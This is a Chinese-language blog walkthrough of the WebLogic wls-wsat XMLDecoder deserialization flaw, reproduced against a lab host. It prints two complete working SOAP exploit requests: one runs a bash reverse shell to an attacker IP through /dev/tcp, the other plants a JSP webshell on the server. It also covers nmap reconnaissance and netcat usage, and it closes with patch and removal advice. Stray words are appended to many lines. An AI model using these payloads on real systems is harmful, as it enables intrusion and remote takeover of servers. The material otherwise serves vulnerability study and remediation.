漏洞背景
Weblogic的WLS Security組件對外提供webservice服務,其中使用了XMLDecoder來解析用戶傳入的XML數據,在解析的過程當中出現反序列化漏洞,致使可執行任意命令。java
利用場景
使用Nmap對目標主機IP作端口掃描,發現7001端口開放。linux
➜ ~ nmap -A 10.211.55.6Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 09:41 CSTNmap scan report for ubuntu-linux20.04.shared (10.211.55.6)Host is up (1.0s latency).Not shown: 999 closed portsPORT STATE SERVICE VERSION open http Oracle WebLogic Server (Servlet 2.5; JSP 2.1): Error 404--Not FoundService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 35.60 seconds
使用瀏覽器打開7001端口所在頁面。web
報錯頁面顯示Weblogic版本,須要在端口後面加上/console,看能不能打開Weblogic的管理後臺頁面,在實際業務中,業務開發人員會屏蔽管理後臺。sql
同時在IP後面跟上/wls-wsat查看響應的組件是否存在。shell
403表示該組件存在,但作了訪問限制,此時可斷定漏洞存在。ubuntu
利用方式
使用BurpSuite抓包
使用火狐瀏覽器打開此頁面,啓動BurpSuite進行抓取數據包操做。瀏覽器
反彈shell的POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 10.211.55.6:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 637<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i >& /dev/tcp/192.168.31.240/4444 0>&1</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/>a</soapenv:Envelope>
在使用反彈shell的POC時,要注意兩個地方:安全
一、Host主機IP是目標主機的IP,演示所用目標主機IP爲:10.211.55.6,在實際滲透測試過程當中根據實際目標主機更改Host的IP地址。bash
二、反彈shell的主機IP是攻擊機的IP地址,根據你的IP地址作調整。微信
數據包在BurpSuite上更改完參數後,鼠標單擊右鍵將此數據包發送至Repeater一欄。
點擊Send以前,須要在攻擊機上開一個shell窗口監聽你設置的攻擊機IP和端口。
而後在BurpSuite上點擊Send。此時漏洞利用成功並在監聽shell頁面反彈回了目標主機的shell。
寫入Webshell POC:
POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 10.211.55.6:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string> <void method="println"><string> <![CDATA[<% out.print("Hacked By 攻防SRC"); %> ]]> </string> </void> <void method="close"/> </object></java></java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
將以上POC使用BurpSuite更改成目標主機IP後,進行發包操做。
訪問Webshell的地址:
此時就利用成功了該漏洞。
踩坑之路
nc的用法
這個仍是得看看nc在不一樣系統裏的使用方式。在shell窗口輸入nc便可彈出使用方式。
(base) ➜ ~ nc -husage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port] [--apple-recv-anyif] [--apple-awdl-unres] [--apple-boundif ifbound] [--apple-no-cellular] [--apple-no-expensive] [--apple-no-flowadv] [--apple-tcp-timeout conntimo] [--apple-tcp-keepalive keepidle] [--apple-tcp-keepintvl keepintvl] [--apple-tcp-keepcnt keepcnt] [--apple-tclass tclass] [--tcp-adp-rtimo num_probes] [--apple-initcoproc-allow] [--apple-tcp-adp-wtimo num_probes] [--setsockopt-later] [--apple-no-connectx] [--apple-delegate-pid pid] [--apple-delegate-uuid uuid] [--apple-kao] [--apple-ext-bk-idle] [--apple-netsvctype svc] [---apple-nowakefromsleep] [--apple-notify-ack] [--apple-sockev] [--apple-tos tos] [--apple-tos-cmsg] [-s source_ip_address] [-w timeout] [-X proxy_version] [-x proxy_address[:port]] [hostname] [port[s]] Command Summary: -4 Use IPv4 -6 Use IPv6 -A Set SO_RECV_ANYIF on socket --apple-recv-anyif -a Set SO_AWDL_UNRESTRICTED on socket --apple-awdl-unres -b ifbound Bind socket to interface --apple-boundif ifbound -C Don't use cellular connection -c Send CRLF as line-ending --apple-no-cellular -D Enable the debug socket option -d Detach from stdin -E Don't use expensive interfaces --apple-no-expensive -F Do not use flow advisory (flow adv enabled by default) --apple-no-flowadv -G conntimo Connection timeout in seconds --apple-tcp-timeout conntimo -H keepidle Initial idle timeout in seconds --apple-tcp-keepalive keepidle -h This help text -I keepintvl Interval for repeating idle timeouts in seconds --apple-tcp-keepintvl keepintvl -i secs Delay interval for lines sent, ports scanned -J keepcnt Number of times to repeat idle timeout --apple-tcp-keepcnt keepcnt -K tclass Specify traffic class --apple-tclass tclass -k Keep inbound sockets open for multiple connects -L num_probes Number of probes to send before generating a read timeout event --tcp-adp-rtimo num_probes -l Listen mode, for inbound connects -m Set SO_INTCOPROC_ALLOW on socket --apple-initcoproc-allow -N num_probes Number of probes to send before generating a write timeout event --apple-tcp-adp-wtimo num_probes -o Issue socket options after connect/bind -n Suppress name/port resolutions --setsockopt-later -O Use old-style connect instead of connectx --apple-no-connectx --apple-delegate-pid pid Set socket as delegate using pid -p port Specify local port for remote connects (cannot use with -l) -r Randomize remote ports -s addr Local source address -t Answer TELNET negotiation -U Use UNIX domain socket -u UDP mode -v Verbose -w secs Timeout for connects and final net reads -X proto Proxy protocol: "4", "5" (SOCKS) or "connect" -x addr[:port] Specify proxy address and port -z Zero-I/O mode [used for scanning] --apple-delegate-uuid uuid Set socket as delegate using uuid --apple-ecn mode Set the ECN mode --apple-ext-bk-idle Extended background idle time --apple-kao Set keep alive offload --apple-netsvctype Set the network service type --apple-nowakefromsleep No wake from sleep --apple-notify-ack Receive events when data gets acknowledged --apple-sockev Receive and print socket events --apple-tos tos Set the IP_TOS or IPV6_TCLASS option --apple-tos-cmsg Set the IP_TOS or IPV6_TCLASS option via cmsgPort numbers can be individual or ranges: lo-hi [inclusi
ve]
漏洞修復
一、臨時解決方案 根據業務全部需求,考慮是否刪除WLS-WebServices組件。包含此組件路徑爲:
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsatMiddleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.warMiddleware/wlserver_10.3/server/lib/wls-wsat.war
以上路徑都在WebLogic安裝處。刪除以上文件以後,需重啓WebLogic。確認http://weblogic_ip/wls-wsat/ 是否爲404頁面。
二、前往Oracle官網下載所提供的安全補丁。
觸類旁通
在復現漏洞過程當中發現了一個Weblogic XMLDecoder反序列化檢查工具,能夠利用這個工具快速檢測目標主機是否存在此漏洞,能夠提升滲透測試工做效率。
本文分享自微信公衆號 - 攻防SRC(SNNUSRC)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。